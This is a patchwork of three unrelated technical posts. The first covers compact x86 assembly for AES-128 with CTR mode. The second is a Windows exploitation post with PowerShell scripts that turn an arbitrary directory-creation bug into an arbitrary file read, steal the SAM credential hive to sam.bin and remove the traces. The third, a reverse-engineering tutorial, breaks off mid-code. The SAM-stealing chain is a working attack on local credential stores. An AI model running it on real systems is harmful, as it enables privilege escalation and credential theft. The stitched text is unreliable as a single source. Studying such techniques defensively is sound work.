Those of you familiar with the x86 architecture will know certain instructions have dependencies or affect the state of other registers after execution. For example, LODSB will load a byte from the memory pointed to by SI into AL before incrementing SI by 1. STOSB will store the byte in AL to the memory pointed to by DI before incrementing DI by 1. MOVSB will move a byte from the memory pointed to by SI to the memory pointed to by DI, before adding 1 to both SI and DI. If the same instruction is preceded by REP (for repeat), then this also affects the CX register, decreasing it by 1 per iteration.

Initialization

The s parameter points to a 32-byte buffer containing a 16-byte plain text and 16-byte master key which is copied to the local buffer x.

A copy of the data is required, because both will be modified during the encryption process. ESI will point to s while EDI will point to x.

EAX will hold the Rcon value declared as c. ECX will be used exclusively for loops, and EDX is a spare register for loops which require an index starting position of zero. There’s a reason to prefer EAX over other registers: byte comparisons are only 2 bytes for AL, while 3 for other registers.

// 2 vs 3 bytes
  /* 0001 */ "\x3c\x6c"             /* cmp al, 0x6c         */
  /* 0003 */ "\x80\xfb\x6c"         /* cmp bl, 0x6c         */
  /* 0006 */ "\x80\xf9\x6c"         /* cmp cl, 0x6c         */
  /* 0009 */ "\x80\xfa\x6c"         /* cmp dl, 0x6c         */

In addition to this, one operation requires saving EAX in another register, which only requires 1 byte with XCHG. Other registers would require 2 bytes.

// 1 vs 2 bytes
  /* 0001 */ "\x92"                 /* xchg edx, eax        */
  /* 0002 */ "\x87\xd3"             /* xchg ebx, edx        */

Setting EAX to 1, our loop counter ECX to 4, and EDX to 0 can be accomplished in a variety of ways requiring only 7 bytes. The alternative for setting EAX here would be: XOR EAX, EAX; INC EAX.

// 7 bytes
  /* 0001 */ "\x6a\x01"             /* push 0x1             */
  /* 0003 */ "\x58"                 /* pop eax              */
  /* 0004 */ "\x6a\x04"             /* push 0x4             */
  /* 0006 */ "\x59"                 /* pop ecx              */
  /* 0007 */ "\x99"                 /* cdq                  */

Another way …

// 7 bytes
  /* 0001 */ "\x31\xc9"             /* xor ecx, ecx         */
  /* 0003 */ "\xf7\xe1"             /* mul ecx              */
  /* 0005 */ "\x40"                 /* inc eax              */
  /* 0006 */ "\xb1\x04"             /* mov cl, 0x4          */

And another..

// 7 bytes
  /* 0000 */ "\x6a\x01"             /* push 0x1             */
  /* 0002 */ "\x58"                 /* pop eax              */
  /* 0003 */ "\x99"                 /* cdq                  */
  /* 0004 */ "\x6b\xc8\x04"         /* imul ecx, eax, 0x4   */

ESI will point to s which contains our plain text and master key. ESI is normally reserved for read operations. We can load a byte with LODS into AL/EAX, and move values from ESI to EDI using MOVS.

Typically we see stack allocation using ADD or SUB, and sometimes (very rarely) using ENTER. This implementation only requires 32-bytes of stack space, and PUSHAD which saves 8 general purpose registers on the stack is exactly 32-bytes of memory, executed in 1 byte opcode.

To illustrate why it makes more sense to use PUSHAD/POPAD instead of ADD/SUB or ENTER/LEAVE, the following are x86 opcodes generated by assembler.

// 5 bytes
  /* 0000 */ "\xc8\x20\x00\x00" /* enter 0x20, 0x0 */
  /* 0004 */ "\xc9"             /* leave           */
  
// 6 bytes
  /* 0000 */ "\x83\xec\x20"     /* sub esp, 0x20   */
  /* 0003 */ "\x83\xc4\x20"     /* add esp, 0x20   */
  
// 2 bytes
  /* 0000 */ "\x60"             /* pushad          */
  /* 0001 */ "\x61"             /* popad           */

Obviously the 2-byte example is better here, but once you require more than 96-bytes, usually ADD/SUB in combination with a register is the better option.

; *****************************
; void E(void *s);
; *****************************
_E:
    pushad
    xor    ecx, ecx           ; ecx = 0
    mul    ecx                ; eax = 0, edx = 0
    inc    eax                ; c = 1
    mov    cl, 4
    pushad                    ; alloca(32)
; F(8)x[i]=((W*)s)[i];
    mov    esi, [esp+64+4]    ; esi = s
    mov    edi, esp
    pushad
    add    ecx, ecx           ; copy state + master key to stack
    rep    movsd
    popad

Multiplication

A pointer to this function is stored in EBP, and there are three reasons to use EBP over other registers:

  1. EBP has no 8-bit registers, so we can’t use it for any 8-bit operations.
  2. Indirect memory access requires 1 byte more for index zero.
  3. The only instructions that use EBP are ENTER and LEAVE.
// 2 vs 3 bytes for indirect access  
  /* 0001 */ "\x8b\x5d\x00"         /* mov ebx, [ebp]       */
  /* 0004 */ "\x8b\x1e"             /* mov ebx, [esi]       */

When writing compact code, EBP is useful only as a temporary register or pointer to some function.

; *****************************
; Multiplication over GF(2**8)
; *****************************
    call   $+21               ; save address      
    push   ecx                ; save ecx
    mov    cl, 4              ; 4 bytes
    add    al, al             ; al <<= 1
    jnc    $+4                ;
    xor    al, 27             ;
    ror    eax, 8             ; rotate for next byte
    loop   $-9                ; 
    pop    ecx                ; restore ecx
    ret
    pop    ebp

SubByte

In the SubBytes step, each byte a_{i,j} in the state matrix is replaced with S(a_{i,j}) using an 8-bit substitution box. The S-box is derived from the multiplicative inverse over GF(2^8), and we can implement SubByte purely using code.

; *****************************
; B SubByte(B x)
; *****************************
sub_byte:  
    pushad 
    test   al, al            ; if(x){
    jz     sb_l6
    xchg   eax, edx
    mov    cl, -1            ; i=255 
; for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
sb_l0:
    mov    al, 1             ; y=1
sb_l1:
    test   ah, ah            ; !c
    jnz    sb_l2    
    cmp    al, dl            ; y!=x
    setz   ah
    jz     sb_l0
sb_l2:
    mov    dh, al            ; y^=M(y)
    call   ebp               ;
    xor    al, dh
    loop   sb_l1             ; --i
; F(4)x^=y=(y<<1)|(y>>7);
    mov    dl, al            ; dl=y
    mov    cl, 4             ; i=4  
sb_l5:
    rol    dl, 1             ; y=R(y,1)
    xor    al, dl            ; x^=y
    loop   sb_l5             ; i--
sb_l6:
    xor    al, 99            ; return x^99
    mov    [esp+28], al
    popad
    ret

AddRoundKey

The state matrix is combined with a subkey using the bitwise XOR operation. This step, known as key whitening, was inspired by the mathematician Ron Rivest, who in 1984 applied a similar technique to the Data Encryption Standard (DES) and called it DESX.

; *****************************
; AddRoundKey
; *****************************
; F(4)s[i]=x[i]^k[i];
    pushad
    xchg   esi, edi           ; swap x and s
xor_key:
    lodsd                     ; eax = x[i]
    xor    eax, [edi+16]      ; eax ^= k[i]
    stosd                     ; s[i] = eax
    loop   xor_key
    popad

AddRoundConstant

There are various cryptographic attacks possible against AES without this small, but important step. It protects against the Slide Attack, first described in 1999 by David Wagner and Alex Biryukov. Without different round constants to generate round keys, all the round keys will be the same.

; *****************************
; AddRoundConstant
; *****************************
; *k^=c; c=M(c);
    xor    [esi+16], al
    call   ebp

ExpandRoundKey

The operation that expands the master key into subkeys for each round of encryption isn’t normally in-lined. To boost performance, these round keys are precomputed before the encryption process, since repeating the same computation would only waste CPU cycles.

Compacting the AES code into a single call requires in-lining the key expansion operation. The C code here is not directly translated into x86 assembly, but the assembly does produce the same result.

; ***************************
; ExpandRoundKey
; ***************************
; F(4)w<<=8,w|=S(((B*)k)[15-i]);w=R(w,8);F(4)w=k[i]^=w;
    pushad
    add    esi,16
    mov    eax, [esi+3*4]    ; w=k[3]
    ror    eax, 8            ; w=R(w,8)
exp_l1:
    call   S                 ; w=S(w)
    ror    eax, 8            ; w=R(w,8);
    loop   exp_l1
    mov    cl, 4
exp_l2:
    xor    [esi], eax        ; k[i]^=w
    lodsd                    ; w=k[i]
    loop   exp_l2
    popad

Combining the steps

An earlier version of the code used separate AddRoundKey, AddRoundConstant, and ExpandRoundKey steps, but since these steps all relate to using and updating the round key, the 3 steps are combined in order to reduce the number of loops, thus shaving off a few bytes.

; *****************************
; AddRoundKey, AddRoundConstant, ExpandRoundKey
; *****************************
; w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
; w=R(w,8)^c;F(4)w=k[i]^=w;
    pushad
    xchg   eax, edx
    xchg   esi, edi
    mov    eax, [esi+16+12]  ; w=R(k[3],8);
    ror    eax, 8
xor_key:
    mov    ebx, [esi+16]     ; t=k[i];
    xor    [esi], ebx        ; x[i]^=t;
    movsd                    ; s[i]=x[i];
; w=(w&-256)|S(w)
    call   sub_byte          ; al=S(al);
    ror    eax, 8            ; w=R(w,8);
    loop   xor_key
; w=R(w,8)^c;
    xor    eax, edx          ; w^=c;
; F(4)w=k[i]^=w;
    mov    cl, 4
exp_key:
    xor    [esi], eax        ; k[i]^=w;
    lodsd                    ; w=k[i];
    loop   exp_key
    popad

Shifting Rows

ShiftRows cyclically shifts the bytes in each row of the state matrix by a certain offset. The first row is left unchanged. Each byte of the second row is shifted one to the left, with the third and fourth rows shifted by two and three respectively.

Because the order of SubBytes and ShiftRows doesn’t matter, they’re combined in one loop.

; ***************************
; ShiftRows and SubBytes
; ***************************
; F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(((B*)s)[i]);
    pushad
    mov    cl, 16
shift_rows:
    lodsb                    ; al = S(s[i])
    call   sub_byte
    push   edx
    mov    ebx, edx          ; ebx = i%4
    and    ebx, 3            ;
    shr    edx, 2            ; (i/4 - ebx) % 4
    sub    edx, ebx          ; 
    and    edx, 3            ; 
    lea    ebx, [ebx+edx*4]  ; ebx = (ebx+edx*4)
    mov    [edi+ebx], al     ; x[ebx] = al
    pop    edx
    inc    edx
    loop   shift_rows
    popad

Mixing Columns

The MixColumns transformation along with ShiftRows are the main source of diffusion. Each column is treated as a four-term polynomial b(x) = b_3x^3 + b_2x^2 + b_1x + b_0, where the coefficients are elements of GF(2^8), and is then multiplied modulo x^4 + 1 with a fixed polynomial a(x) = 3x^3 + x^2 + x + 2.

; *****************************
; MixColumns
; *****************************
; F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    pushad
mix_cols:
    mov    eax, [edi]        ; w0 = x[i];
    mov    ebx, eax          ; w1 = w0;
    ror    eax, 8            ; w0 = R(w0,8);
    mov    edx, eax          ; w2 = w0;
    xor    eax, ebx          ; w0^= w1;
    call   ebp               ; w0 = M(w0);
    xor    eax, edx          ; w0^= w2;
    ror    ebx, 16           ; w1 = R(w1,16);
    xor    eax, ebx          ; w0^= w1;
    ror    ebx, 8            ; w1 = R(w1,8);
    xor    eax, ebx          ; w0^= w1;
    stosd                    ; x[i] = w0;
    loop   mix_cols
    popad
    jmp    enc_main

Counter Mode (CTR)

Block ciphers should never be used in Electronic Code Book (ECB) mode, and the ECB Penguin illustrates why.

[Image: the ECB Penguin]
As you can see, blocks of the same data using the same key result in the exact same ciphertexts, which is why modes of encryption were invented. Galois/Counter Mode (GCM) is authenticated encryption which uses Counter (CTR) mode to provide confidentiality.

The concept of CTR mode which turns a block cipher into a stream cipher was first proposed by Whitfield Diffie and Martin Hellman in their 1979 publication, Privacy and Authentication: An Introduction to Cryptography.

CTR mode works by encrypting a nonce and counter, then XORing the resulting ciphertext block with the plaintext. Since AES encrypts 16-byte blocks, the counter can be 8 bytes and the nonce 8 bytes.

The following is a very simple implementation of this mode using the AES-128 implementation.

// encrypt using Counter (CTR) mode
void encrypt(W len, B *ctr, B *in, B *key){
    W i,r;
    B t[32];

    // copy master key to local buffer
    F(16)t[i+16]=key[i];

    while(len){
      // copy counter+nonce to local buffer
      F(16)t[i]=ctr[i];
      
      // encrypt t
      E(t);
      
      // XOR plaintext with ciphertext
      r=len>16?16:len;
      F(r)in[i]^=t[i];
      
      // update length + position
      len-=r;in+=r;
      
      // update counter
      for(i=15;i>=0;i--)
        if(++ctr[i])break;
    }
}

In assembly

; void encrypt(W len, B *ctr, B *in, B *key)
_encrypt:
    pushad
    lea    esi,[esp+32+4]
    lodsd
    xchg   eax, ecx          ; ecx = len
    lodsd
    xchg   eax, ebp          ; ebp = ctr
    lodsd
    xchg   eax, edx          ; edx = in
    lodsd
    xchg   esi, eax          ; esi = key
    pushad                   ; alloca(32)
; copy master key to local buffer
; F(16)t[i+16]=key[i];
    lea    edi, [esp+16]     ; edi = &t[16]
    movsd
    movsd
    movsd
    movsd
aes_l0:
    xor    eax, eax
    jecxz  aes_l3            ; while(len){
; copy counter+nonce to local buffer
; F(16)t[i]=ctr[i];
    mov    edi, esp          ; edi = t
    mov    esi, ebp          ; esi = ctr
    push   edi
    movsd
    movsd
    movsd
    movsd
; encrypt t    
    call   _E                ; E(t)
    pop    edi
aes_l1:
; xor plaintext with ciphertext
; r=len>16?16:len;
; F(r)in[i]^=t[i];
    mov    bl, [edi+eax]     ; 
    xor    [edx], bl         ; *in++^=t[i];
    inc    edx               ; 
    inc    eax               ; i++
    cmp    al, 16            ;
    loopne aes_l1            ; while(i!=16 && --ecx!=0)
; update counter
    xchg   eax, ecx          ; 
    mov    cl, 16
aes_l2:
    inc    byte[ebp+ecx-1]   ;
    loopz  aes_l2            ; while(++c[i]==0 && --ecx!=0)
    xchg   eax, ecx
    jmp    aes_l0
aes_l3:
    popad
    popad
    ret

Summary

The final assembly code for ECB mode is 205 bytes, and 272 for CTR mode.

Check sources here.

Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. So as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts which detail small, self contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.

 

In this post I'm going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary directory creation vulnerabilities do exist (for example, here's one that was in the Linux subsystem), but it's not always obvious how you'd exploit such a bug, in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support, where you create a directory called program.exe.local to do DLL planting, but that's not always reliable as you'll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.

 

For this blog we’ll use my example driver from the Workshop which already contains a vulnerable directory creation bug, and we’ll write a Powershell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.

Quick Background on the Vulnerability Class

When dealing with files from the Win32 API you've got two functions, CreateFile and CreateDirectory, so it would make sense that there's a separation between the two operations. However, at the Native API level there's only ZwCreateFile; the kernel separates files from directories by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE in the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if directories are the main file type, I've no idea.

 

A very simple vulnerable example you might see in a kernel driver looks like the following:

 

NTSTATUS KernelCreateDirectory(PHANDLE Handle,
                               PUNICODE_STRING Path) {
  IO_STATUS_BLOCK io_status = { 0 };
  OBJECT_ATTRIBUTES obj_attr = { 0 };

  InitializeObjectAttributes(&obj_attr, Path,
     OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE);

  return ZwCreateFile(Handle, MAXIMUM_ALLOWED,
                      &obj_attr, &io_status,
                      NULL, FILE_ATTRIBUTE_NORMAL,
                      FILE_SHARE_READ | FILE_SHARE_DELETE,
                      FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}

 

There are three important things to note about this code that determine whether it's a vulnerable directory creation bug. Firstly, it's passing FILE_DIRECTORY_FILE to CreateOptions, which means it's going to create a directory. Secondly, it's passing FILE_OPEN_IF as the Disposition parameter, which means the directory will be created if it doesn't exist, or opened if it does. And thirdly, and perhaps most importantly, the driver is calling a Zw function, which means the call to create the directory will default to running with kernel permissions, which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES; however, we can see from the flags passed to InitializeObjectAttributes that the flag is not being set in this case.

 

Just from this snippet of code we don’t know where the destination path is coming from, it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user which means you can modify the Security Descriptor to give you full access to the directory. In many cases even this isn’t necessary as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately.

Creating an Arbitrary Directory

If you want to follow along you’ll need to setup a Windows 10 VM (doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager Powershell Module. It’s available on the Powershell Gallery, which is an online module repository so follow the details there.

Assuming that’s all done, let’s get to work. First let’s look how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for, it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.

 

Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
    Param([int]$ControlCode)
    [NtApiDotNet.NtIoControlCode]::new("Unknown",`
        0x800 -bor $ControlCode, "Buffered", "Any")
}

function New-Directory {
  Param([string]$Filename)
  # Open the device driver.
  Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
    # Get IOCTL for ControlCreateDir (2)
    $ioctl = Get-DriverIoCtl -ControlCode 2
    # Convert DOS filename to NT
    $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
    $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
    $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
  }
}

 

The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls the DeviceIoControl function on the device. We could just pass an integer value for control code but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.


It works and we’ve successfully created the arbitrary directory. Just to check we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account which means we can get full access to the directory.

Now the problem is what to do with this ability? There's no doubt some system service which might look through a list of directories for an executable to run or a configuration file to parse, but it'd be nice not to rely on something like that. As the title suggests, we'll instead convert this into an arbitrary file read. How might we go about doing that?

Mount Point Abuse

If you've watched my talk on Abusing Windows Symbolic Links you'll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the directory, and the NTFS driver reads it when opening the directory. The attribute contains an alternative native NT object manager path to the destination of the symbolic link, which is passed back to the IO manager to continue processing. This allows the mount point to work between different volumes, but it has one interesting consequence: the path doesn't actually have to point to another directory. What if we give it a path to a file?

 

If you use the Win32 APIs it will fail, and if you use the NT APIs directly you'll find yourself in a weird paradox. If you try to open the mount point as a file the error will say it's a directory, and if you instead try to open it as a directory it will tell you it's really a file. It turns out that if you don't specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.

Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove all flags) and ideally get the service to read and return the file data?
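As a rough user-mode illustration (a hedged sketch of mine, not from the post, and the path is just a placeholder): passing FILE_FLAG_BACKUP_SEMANTICS to CreateFile means neither of the two NT flags is set, so the same call is happy to open a file, a directory, or a mount point regardless of what it redirects to.

#include <windows.h>
#include <cstdio>

int main() {
    // FILE_FLAG_BACKUP_SEMANTICS: don't force FILE_DIRECTORY_FILE or
    // FILE_NON_DIRECTORY_FILE, so the open doesn't care which one the target is.
    HANDLE h = CreateFileW(L"C:\\Windows\\System32", GENERIC_READ,
                           FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
                           nullptr, OPEN_EXISTING,
                           FILE_FLAG_BACKUP_SEMANTICS, nullptr);
    if (h == INVALID_HANDLE_VALUE) {
        printf("open failed: %lu\n", GetLastError());
        return 1;
    }
    printf("opened without committing to file-vs-directory\n");
    CloseHandle(h);
    return 0;
}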

National Language Support

Windows supports many different languages, and in order to support non-unicode encodings still supports Code Pages. A lot is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode, perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code, it’s not a very big function:

 

NTSTATUS NtGetNlsSectionPtr(DWORD NlsType,
                            DWORD CodePage,
                            PVOID *SectionPointer,
                            PULONG SectionSize) {
  UNICODE_STRING section_name;
  OBJECT_ATTRIBUTES section_obj_attr;
  HANDLE section_handle;
  RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
  InitializeObjectAttributes(&section_obj_attr,
                             &section_name,
                             OBJ_KERNEL_HANDLE |
                             OBJ_OPENIF |
                             OBJ_CASE_INSENSITIVE |
                             OBJ_PERMANENT);

  // Open section under \NLS directory.
  if (!NT_SUCCESS(ZwOpenSection(&section_handle,
                         SECTION_MAP_READ,
                         &section_obj_attr))) {
    // If no section then open the corresponding file and create section.
    UNICODE_STRING file_name;
    OBJECT_ATTRIBUTES obj_attr;
    HANDLE file_handle;

    RtlpInitNlsFileName(NlsType,
                        CodePage,
                        &file_name);
    InitializeObjectAttributes(&obj_attr,
                               &file_name,
                               OBJ_KERNEL_HANDLE |
                               OBJ_CASE_INSENSITIVE);
    ZwOpenFile(&file_handle, SYNCHRONIZE,
               &obj_attr, FILE_SHARE_READ, 0);
    ZwCreateSection(&section_handle, FILE_MAP_READ,
                    &section_obj_attr, NULL,
                    PROTECT_READ_ONLY, MEM_COMMIT, file_handle);
    ZwClose(file_handle);
  }

  // Map section into memory and return pointer.
  NTSTATUS status = MmMapViewOfSection(
                      section_handle,
                      SectionPointer,
                      SectionSize);
  ZwClose(section_handle);
  return status;
}

 

The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:


The named sections are of the form NlsSectionCP<NUM>, where NUM is the number of the code page to map. You'll also notice there's a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter; we don't care about normalization for the moment. If the section object isn't found, the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally the section is mapped into memory and returned to the caller.

 

There are two important things to note here. First, the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call, which means the call will open any file even if the caller doesn't have access to it. And most importantly, the final parameter of ZwOpenFile is 0, which means neither FILE_DIRECTORY_FILE nor FILE_NON_DIRECTORY_FILE is being set. Not setting these flags gives us our desired condition: the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:

 

void RtlpInitNlsFileName(DWORD NlsType,
                         DWORD CodePage,
                         PUNICODE_STRING String) {
  if (NlsType == NLS_CODEPAGE) {
     RtlStringCchPrintfW(String,
              L"\\SystemRoot\\System32\\c_%.3d.nls", CodePage);
  } else {
     // Get normalization path from registry.
     // NOTE about how this is arbitrary registry write to file.
  }
}

 

The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters and making it an actual vulnerability. Also note that if the normalization path is requested the information is read out from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read, but that’s for the interested reader to investigate.

 

I think it’s clear now what we have to do, create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file then use the NLS system call to open and map the file. Choosing a code page number is easy, 1337 is unused. But what file should we read? A common file to read is the SAM registry hive which contains logon information for local users. However access to the SAM file is usually blocked as it’s not sharable and even just opening for read access as an administrator will fail with a sharing violation. There’s of course a number of ways you can get around this, you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait we’re in luck.

 

File sharing on Windows files depends on the access being requested. For example if the caller requests Read access but the file is not shared for read access then it fails. However it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, rights which are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE and so will always allow the file to be opened even if locked with no sharing access.

 

But how can that work? Doesn't ZwCreateSection need a readable file handle to do the read-only file mapping? Yes and no. Windows file objects do not really care whether a file is readable or writable; access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user mode the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed; for a read-only mapping the kernel requires the handle to have Read Data access. However, just as with access checking on files, if the kernel calls ZwCreateSection access checking is disabled, including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access, which means we can open any file on the system regardless of its sharing mode, and that includes the SAM file.

 

So let's put the final touches to this: we create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally we just copy the mapped file memory out into a new file and we're done.

 

$dir = "\SystemRoot\system32\c_1337.nls"
New-Directory $dir

$target_path = "\SystemRoot\system32\config\SAM"
Use-NtObject($file = Get-NtFile $dir `
             -Options OpenReparsePoint,DirectoryFile) {
  $file.SetMountPoint($target_path, $target_path)
}

Use-NtObject($map =
    [NtApiDotNet.NtLocale]::GetNlsSectionPtr("CodePage", 1337)) {
  Use-NtObject($output = [IO.File]::OpenWrite("sam.bin")) {
    $map.GetStream().CopyTo($output)
    Write-Host "Copied file"
  }
}

 

Loading the created file in a hex editor shows we did indeed steal the SAM file.


For completeness we'll clean up our mess. We can just delete the directory by opening it with the Delete On Close flag and then closing the handle (making sure to open it as a reparse point, otherwise you'll try and open the SAM again). As for the section, since the object was created in our security context (just like the directory) and there was no explicit security descriptor, we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.

 

Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                     -Access Delete) {
  # Delete permanent object.
  $sect.MakeTemporary()
}

What I've described in this blog post is not a vulnerability, although the code certainly doesn't seem to follow best practice. It's a system call which hasn't changed since at least Windows 7, so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it's already open or shared. I've put the final script on GitHub at this link if you want the final version to get a better understanding of how it works.

 

It's worth keeping a log of any unusual behaviours when you're reverse engineering a product in case they become useful later, as happened in this case. Many times I've found code which isn't itself a vulnerability but has some useful properties which allow you to build out exploitation chains.

Reverse Engineering Basic Programming Concepts

Reverse Engineering

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I'm a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy-to-comprehend information all in one place. This "BOLO: Reverse Engineering" series is exactly that! Throughout this article series I will be showing you things to Be On the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you're seeing and why things look the way they look. Furthermore, this article series will not cover the basics of assembly; it will only present patterns and decompiled code so that you can get a general understanding of what to look for and how to interpret assembly code.

Throughout this article we will cover:

  1. Variable Initiation
  2. Basic Output
  3. Mathematical Operations
  4. Functions
  5. Loops (For loop / While loop)
  6. Conditional Statements (IF Statement / Switch Statement)
  7. User Input

please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.


Variable Initiation

Variables are extremely important when programming. Here we can see a few important variables:

  1. a string
  2. an int
  3. a boolean
  4. a char
  5. a double
  6. a float
  7. a char array
Basic Variables

Please note: In C++, 'string' is not a primitive type, but I thought it important to show you anyway.
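The code screenshot isn't reproduced here, but a minimal sketch of variables like those listed (names and values are my own guesses, except intvar, which appears later in the article) might look like:

#include <string>

int main() {
    std::string str = "hello";    // a string (not a primitive type)
    int intvar = 10;              // an int
    bool flag = true;             // a boolean
    char letter = 'c';            // a char
    double dbl = 3.14;            // a double
    float flt = 3.14f;            // a float
    char chararray[] = "array";   // a char array
    return 0;
}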

Now, let's take a look at the assembly:

Initiating Variables

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them.

Initializing Variables

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

C++ String Initiation

As you can see, initializing a string requires a call to a built-in initialization function.

Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Basic Output
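Since the screenshot isn't shown here, a minimal sketch of the kind of output code being described (the literal text is my guess; intvar and the "%i" format specifier come from the walkthrough below):

#include <cstdio>

int main() {
    int intvar = 10;
    printf("This is a string literal\n");  // string literal pushed for printf
    printf("%i\n", intvar);                // integer output via the "%i" specifier
    return 0;
}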

Now, let’s take a look at the assembly:

First, the string literal:

String Literal Output

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

Variable Output

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

  1. Addition
  2. Subtraction
  3. Multiplication
  4. Division
  5. Bitwise AND
  6. Bitwise OR
  7. Bitwise XOR
  8. Bitwise NOT
  9. Bitwise Right-Shift
  10. Bitwise Left-Shift
Mathematical Functions Code
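The code screenshot isn't reproduced here; a minimal sketch of the operations described (the name of the second operand is my assumption) would be:

#include <cstdio>

int main() {
    int A = 0x0A;             // decimal 10
    int B = 0x0F;             // decimal 15 (second operand; name assumed)

    printf("%i\n", A + B);    // addition        -> add
    printf("%i\n", A - B);    // subtraction     -> sub
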